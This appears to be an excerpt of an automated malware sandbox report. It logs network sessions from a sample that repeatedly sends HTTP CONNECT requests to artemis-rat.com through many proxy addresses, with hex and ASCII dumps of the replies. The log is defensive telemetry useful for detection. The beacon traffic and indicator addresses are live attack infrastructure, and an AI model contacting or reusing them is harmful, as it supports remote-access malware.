                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:04.209476948 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            954192.168.2.552440202.74.48.6610883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.461038113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            955192.168.2.552604185.162.229.215803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.461218119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.615920067 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            956192.168.2.552632172.67.242.194803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.504750013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.659790993 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            957192.168.2.552642104.21.218.103803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.516730070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.676661968 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            958192.168.2.552637104.25.135.170803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.518582106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.676651001 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            959192.168.2.55258838.162.16.5231283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.526858091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.946166992 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            960192.168.2.552652162.159.242.8803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.527308941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.688744068 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            961192.168.2.552669104.16.241.204803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.540431023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.694704056 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            962192.168.2.552674185.162.228.154803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.541026115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.695338011 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            963192.168.2.552623162.214.90.49587403876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.545202017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.107958078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.806381941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.939476967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.124543905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.311537027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.468369007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.905148983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.514471054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            964192.168.2.552691104.18.81.76803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.546873093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.701215029 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
